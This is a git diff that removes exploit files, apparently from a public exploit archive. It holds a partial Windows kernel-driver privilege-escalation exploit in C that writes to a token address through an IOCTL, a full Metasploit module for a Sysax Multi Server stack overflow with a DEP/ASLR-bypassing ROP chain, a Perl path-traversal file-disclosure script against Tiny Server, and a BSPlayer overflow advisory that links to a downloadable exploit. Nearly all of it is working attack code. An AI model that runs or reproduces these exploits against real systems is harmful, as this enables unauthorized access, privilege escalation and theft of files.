*PSYSTEM_HANDLE_INFORMATION; - - -// Undocumented FILE_INFORMATION_CLASS: FileNameInformation -const FILE_INFORMATION_CLASS FileNameInformation = -(FILE_INFORMATION_CLASS)9; - -// The NtQueryInformationFile function and the structures that it returns -// are internal to the operating system and subject to change from one -// release of Windows to another. To maintain the compatibility of your -// application, it is better not to use the function. -typedef NTSTATUS (WINAPI * PFN_NTQUERYINFORMATIONFILE)( - IN HANDLE FileHandle, - OUT PIO_STATUS_BLOCK IoStatusBlock, - OUT PVOID FileInformation, - IN ULONG Length, - IN FILE_INFORMATION_CLASS FileInformationClass - ); - -// FILE_NAME_INFORMATION contains name of queried file object. -typedef struct _FILE_NAME_INFORMATION { - ULONG FileNameLength; - WCHAR FileName[1]; -} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION; - - -void* FindTokenAddressHandles(ULONG pid) -{ - ///////////////////////////////////////////////////////////////////////// - // Prepare for NtQuerySystemInformation and NtQueryInformationFile. - // - - // The functions have no associated import library. You must use the - // LoadLibrary and GetProcAddress functions to dynamically link to - // ntdll.dll. - - HINSTANCE hNtDll = LoadLibrary(_T("ntdll.dll")); - assert(hNtDll != NULL); - - PFN_NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = - (PFN_NTQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll, - "NtQuerySystemInformation"); - assert(NtQuerySystemInformation != NULL); - - - ///////////////////////////////////////////////////////////////////////// - // Get system handle information. - // - - DWORD nSize = 4096, nReturn; - PSYSTEM_HANDLE_INFORMATION pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) - HeapAlloc(GetProcessHeap(), 0, nSize); - - // NtQuerySystemInformation does not return the correct required buffer - // size if the buffer passed is too small. Instead you must call the - // function while increasing the buffer size until the function no longer - // returns STATUS_INFO_LENGTH_MISMATCH. - while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, - nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH) - { - HeapFree(GetProcessHeap(), 0, pSysHandleInfo); - nSize += 4096; - pSysHandleInfo = (SYSTEM_HANDLE_INFORMATION*)HeapAlloc( - GetProcessHeap(), 0, nSize); - } - - for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++) - { - - PSYSTEM_HANDLE pHandle = &(pSysHandleInfo->Handles[i]); - - if (pHandle->ProcessId == pid && pHandle->ObjectTypeNumber == HANDLE_TYPE_TOKEN) - { - printf(" ObjectTypeNumber %d , ProcessId %d , Object %p \r\n",pHandle->ObjectTypeNumber,pHandle->ProcessId,pHandle->Object); - return pHandle->Object; - } - } - - ///////////////////////////////////////////////////////////////////////// - // Clean up. - // - HeapFree(GetProcessHeap(), 0, pSysHandleInfo); - - return 0; -} - -void main() -{ - DWORD dwBytesReturned; - DWORD ShellcodeFakeMemory; - HANDLE token; - - - // first create toke handle so find object address with handle - if(!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&token)) - DebugBreak(); - - void* TokenAddress = FindTokenAddressHandles(GetCurrentProcessId()); - - CloseHandle(token); - - // i dont want write fully weaponized exploit so criminal must write code to find "WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3" in runtime ( simple task :) - HANDLE hDriver = CreateFileA("\\\\.\\WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3}",GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); - if(hDriver!=INVALID_HANDLE_VALUE) - { - fprintf(stderr," Open Driver OK\n"); - - if (!DeviceIoControl(hDriver, SL_IOCTL_GET_EVENT_NAME, NULL,0x80,(void*)((char*)TokenAddress+0x34),NULL,&dwBytesReturned, NULL)) - { - fprintf(stderr,"send IOCTL error %d.\n",GetLastError()); - return; - } - else fprintf(stderr," Send IOCTL OK\n"); - } - - else - { - fprintf(stderr," Open Driver error %d.\n",GetLastError()); - return; - } - - - CloseHandle(hDriver); - getchar(); - -} \ No newline at end of file diff --git a/platforms/windows/remote/20676.rb b/platforms/windows/remote/20676.rb deleted file mode 100755 index c5cddebeb..000000000 --- a/platforms/windows/remote/20676.rb +++ /dev/null @@ -1,195 +0,0 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking - - include Msf::Exploit::Remote::HttpClient - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Sysax Multi Server 5.64 Create Folder Buffer Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in the create folder function - in Sysax Multi Server 5.64. This issue was fixed in 5.66. - - You must have valid credentials to trigger the vulnerability. Your credentials - must also have the create folder permission and the HTTP option has to be enabled. - This module will log into the server, get your a SID token, find the root folder, - and then proceed to exploit the server. Successful exploits result in LOCALSYSTEM - access. This exploit works on XP SP3, and Server 2003 SP1-SP2. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Matt "hostess" Andreko', - ], - 'References' => - [ - [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Platform' => 'win', - 'Payload' => - { - 'BadChars' => "\x00\x2F\x0d\x0a", # 0d and 0a are only bad, due to the Rex::MIME replacing 0d with 0d0a in the message#to_s - 'Space' => '1299', - 'DisableNops' => true, - }, - - 'Targets' => - [ - [ 'Windows XP SP3', - { - 'Rop' => false, - 'Ret' => 0x77c35459, # push esp # ret [msvcrt.dll] - 'Offset' => 711, - } - ], - [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass', - { - 'Rop' => true, - 'Ret' => 0x77baf605, # pop esi; pop ebp; retn 0c; [msvcrt.dll] (pivot) - 'Offset' => 711, - 'Nop' => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] - } - ], - ], - 'Privileged' => false, - 'DisclosureDate'=> 'July 29, 2012', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('TARGETURI', [true, 'The URI path to the Sysax web application', '/']), - Opt::RPORT(80), - OptString.new('SysaxUSER', [ true, "Username" ]), - OptString.new('SysaxPASS', [ true, "Password" ]) - ], self.class) - - end - - def create_rop_chain() - rop_gadgets = [] - - # ROP chains provided by Corelan.be - # https://www.corelan.be/index.php/security/corelan-ropdb/#msvcrtdll_8211_v7037903959_Windows_2003_SP1_SP2 - if (target == targets[1]) # Windows 2003 - rop_gadgets = - [ - 0x77be3adb, # POP EAX # RETN [msvcrt.dll] - 0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll] - 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll] - 0x41414141, # Filler (compensate) - 0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll] - 0x77bdb896, # POP EBP # RETN [msvcrt.dll] - 0x77be2265, # & push esp # ret [msvcrt.dll] - 0x77bdeebf, # POP EAX # RETN [msvcrt.dll] - 0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx) - 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] - 0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll] - 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] - 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx) - 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] - 0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll] - 0x77bcc2ee, # POP ECX # RETN [msvcrt.dll] - 0x77befbb4, # &Writable location [msvcrt.dll] - 0x77bbf75e, # POP EDI # RETN [msvcrt.dll] - 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] - 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] - 0x90909090, # nop - 0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll] - ].flatten.pack("V*") - end - - return rop_gadgets - - end - - def get_sid - - user = datastore['SysaxUSER'] - pass = datastore['SysaxPASS'] - - creds = "fd=#{Rex::Text.encode_base64(user+"\x0a"+pass)}" - - # Login to get SID value - r = send_request_cgi({ - 'method' => "POST", - 'uri' => "#{target_uri.to_s}scgi?sid=0&pid=dologin", - 'data' => creds - }) - - # Parse response for SID token - sid = r.body.match(/sid=([A-Z0-9a-z]{40})/)[1] - print_status "SID: #{sid.to_s}" - - sid.to_s - - end - - def get_root_path(sid) - - # Find the path because it's used to help calculate the offset - random_folder_name = rand_text_alpha(8) # This folder should not exist in the root dir - - r = send_request_cgi({ - 'uri' => "#{target_uri.to_s}scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm", - 'method' => 'POST', - }) - - # Example message: invalid path: C:\Documents and Settings\Administrator\Desktop\9dk2hdh2. - # Root Path should be C:\Documents and Settings\Administrator\Desktop (no trailing slash) - root_path = r.body.match(/^invalid path: (.*)\\#{random_folder_name}\.$/)[1] - print_status "Root Dir: #{root_path}" - - root_path - - end - - def exploit - - connect - - sid = get_sid - root_path = get_root_path(sid) - - buffer = rand_text(target['Offset']-root_path.length) - buffer << [target.ret].pack('V') - - if (target['Rop']) - buffer << [target['Nop']].pack('V')*16 - buffer << create_rop_chain() - end - - buffer << make_nops(15) - buffer << payload.encoded - - post_data = Rex::MIME::Message.new - post_data.add_part(buffer, nil, nil, "form-data; name=\"e2\"") - post_data.bound = rand_text_numeric(57) # example; "---------------------------12816808881949705206242427669" - - r = send_request_cgi({ - 'uri' => "#{target_uri.to_s}scgi?sid=#{sid}&pid=mk_folder2_name1.htm", - 'method' => 'POST', - 'data' => post_data.to_s, - 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", - }) - - disconnect - - end -end diff --git a/platforms/windows/remote/35426.pl b/platforms/windows/remote/35426.pl deleted file mode 100755 index 89a717d84..000000000 --- a/platforms/windows/remote/35426.pl +++ /dev/null @@ -1,109 +0,0 @@ -#!/usr/bin/perl -w -#Title : Tiny Server v1.1.9 Arbitrary File Disclosure Exploit -#Download : http://tinyserver.sourceforge.net/tinyserver_full.zip -#Author : ZoRLu / zorlu@milw00rm.com -#Website : http://milw00rm.com / its online -#Twitter : https://twitter.com/milw00rm or @milw00rm -#Test : Windows7 Ultimate -#Date : 29/11/2014 -#Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others -#BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) ) - -use LWP::Simple; -use LWP::UserAgent; -use IO::Socket; - - -sub zorban() { - system(($^O eq 'MSWin32') ? 'cls' : 'clear'); - print "\n\t\t~~~~~~ Software : Tiny Server\n"; - print "\n\t\t~~~~~~ Version : 1.1.5\n"; - print "\n\t\t~~~~~~ Class : File Disclosure\n"; - print "\n\t\t~~~~~~ Wrote by ZoRLu / milw00rm.com\n\n"; - } - -sub zorhelp() { - print "[+] perl $0 127.0.0.1 80 windows/system.ini\n"; - } - -if(@ARGV != 3) { - zorban(); - print "[-] not this! like this:\n"; - zorhelp(); - exit(); - } - -sub zoragent { - my @array = ('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', - 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', - 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4', - 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', - 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', - 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', - 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0', - 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', - 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53', - 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53', - 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', - 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0', - 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', - 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', - 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10', - 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0', - 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53', - 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9', - 'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', - 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53', - 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14', - 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', - 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0', - 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', - 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', - 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0', - 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', - 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', - 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53', - 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', - 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', - 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', - 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36', - 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0', - 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3', - 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'); - - my $zrl = $array[rand @array]; - return($zrl); - } - - my $ip = $ARGV[0]; - my $port = $ARGV[1]; - my $file = $ARGV[2]; - my $path = "/../../"; # you can change for your file path. because its for file of "windows" folder - my $link1 = "http://" . $ip . ":" . $port; - my $link2 = "http://" . $ip . ":" . $port . $path . $file; - - my $useragent = zoragent(); - my $zoa = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); - $zoa->timeout(60); - $zoa->agent($useragent); - my $status = $zoa->get("$link2"); - unless ($status->is_success) { - - zorban(); - print("\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"); - sleep(1); - print "\n[-] Error: " . $status->status_line . "\n"; - print("\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"); - exit; - } else { - zorban(); - print("Connect : $link1\n"); - sleep(1); - print("Read : $file\n"); - sleep(1); - $readfile = get $link2; - print("\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"); - print("$readfile"); - print("\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"); - exit; - } \ No newline at end of file diff --git a/platforms/windows/remote/35841.txt b/platforms/windows/remote/35841.txt deleted file mode 100755 index 1769b3b69..000000000 --- a/platforms/windows/remote/35841.txt +++ /dev/null @@ -1,31 +0,0 @@ -# Exploit Title: Bsplayer HTTP Response BOF -# Date: Jan 17 ,2015 -# Exploit Author: Fady Mohamed Osman (@fady_osman) -# Vendor Homepage: www.bsplayer.com -# Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html -# Version: current (2.68). -# Tested on: Windows 7 sp1 x86 version. -# Exploit-db : http://www.exploit-db.com/author/?a=2986 -# Youtube : https://www.youtube.com/user/cutehack3r - -Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35841.tar.gz - -Bsplayer suffers from a buffer overflow vulnerability when processing the -HTTP response when opening a URL. In order to exploit this bug I needed to -load a dll with no null addresses and no safeseh ,ASLR or DEP. I noticed -that one of the dlls that matches this criteria is (MSVCR71.dll) and it's -loaded when I loaded an flv file over the network and that's why I'm -sending a legitimate flv file first so later we can use the loaded dll. -Also the space after the seh record is pretty small so what I did is that I -added a small stage shell cdoe to add offset to esp so it points at the -beginning of my buffer and then a jmp esp instruction to execute the actual -shellcode. - - --- - -*Regards,* - -Fady Osman -about.me/Fady_Osman -